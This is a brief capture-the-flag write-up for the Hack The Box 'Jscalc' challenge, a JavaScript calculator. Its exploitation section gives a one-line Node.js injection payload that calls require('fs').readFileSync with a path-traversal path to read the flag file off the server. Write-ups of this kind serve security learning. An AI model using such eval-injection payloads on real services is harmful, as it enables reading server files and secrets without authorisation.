https://app.hackthebox.com/challenges/551

Description

In the mysterious depths of the digital sea, a specialized JavaScript calculator has been crafted by tech-savvy squids. With multiple arms and complex problem-solving skills, these cephalopod engineers use it for everything from inkjet trajectory calculations to deep-sea math. Attempt to outsmart it at your own risk! 🦑

Exploitation

require(`fs`).readFileSync(`../../flag.txt`).toString()

Summary

Jscalc: use path traversal to escape the intended read path and recover the flag.